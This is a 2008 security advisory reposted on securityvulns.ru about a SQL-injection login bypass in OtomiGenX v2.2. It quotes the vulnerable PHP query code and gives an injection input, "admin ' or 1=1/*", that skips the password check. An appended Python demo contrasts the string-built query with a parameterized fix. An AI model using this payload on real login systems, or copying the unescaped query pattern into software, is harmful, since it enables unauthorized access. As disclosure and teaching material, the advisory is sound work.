Computer Security
[EN] securityvulns.ru

From:hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:02.06.2008
Subject:OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability


####################################################################################
#                                                                                  #
#  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #
####################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
--------
Discovered by: virangar security team (hadihadi)

special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
----------------
.::::admin Authentication bypass vuln::::.
//vulnerable code in login.php:
...
line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password (unsalted)

// $_POST[userAccount] and $_POST[userType] are interpolated into the SQL
// string unescaped, so a quote in either field changes the WHERE clause
if($_POST[userType] != 'Staff')
{
    $sql = "SELECT userID, userName
            FROM user_account
            WHERE userAccount='$_POST[userAccount]' AND
                  userPassword='$passwd' AND
                  userType='$_POST[userType]' AND isApproved='1'";
}
else
{
    $sql = "SELECT staffID, staffName, staffGroupID
            FROM staff
            WHERE staffAccount='$_POST[userAccount]' AND
                  staffPassword='$passwd'";
}
...


-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------
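The staff lookup from login.php above, rebuilt as an added example (not code from the advisory or from OtomiGenX) in Python over an in-memory SQLite table, once with the string-built query the advisory shows and once with bound parameters; the staff row and the password "s3cret" are constructed for the demonstration.

```python
"""String-built vs. parameterized version of the OtomiGenX staff login query."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed staff table with the columns the advisory's query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE staff (staffID INTEGER, staffName TEXT, staffGroupID INTEGER,"
        " staffAccount TEXT, staffPassword TEXT)"
    )
    # one constructed account; password stored as unsalted md5, as login.php does
    conn.execute(
        "INSERT INTO staff VALUES (1, 'Administrator', 1, 'admin', ?)",
        (hashlib.md5(b"s3cret").hexdigest(),),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, account: str, password: str):
    """Interpolates the account field into the WHERE clause, as login.php does.
    A quote in `account` ends the string literal and the rest of the field
    becomes SQL; '/*' then comments out the password check entirely."""
    passwd = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT staffID, staffName, staffGroupID FROM staff "
        f"WHERE staffAccount='{account}' AND staffPassword='{passwd}'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn: sqlite3.Connection, account: str, password: str):
    """Same lookup with bound parameters: the input is only ever compared as a
    value, never parsed as SQL. The unsalted md5 is kept so the two functions
    differ only in query construction; replacing it with a real password hash
    (PHP's password_hash()) is a separate fix."""
    passwd = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT staffID, staffName, staffGroupID FROM staff "
        "WHERE staffAccount=? AND staffPassword=?"
    )
    return conn.execute(sql, (account, passwd)).fetchone()
```

Running the advisory's own account value through both functions shows the string-built query returning the administrator row for any password while the parameterized one returns nothing.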

© SecurityVulns, 3APA3A, Vladimir Dubrovin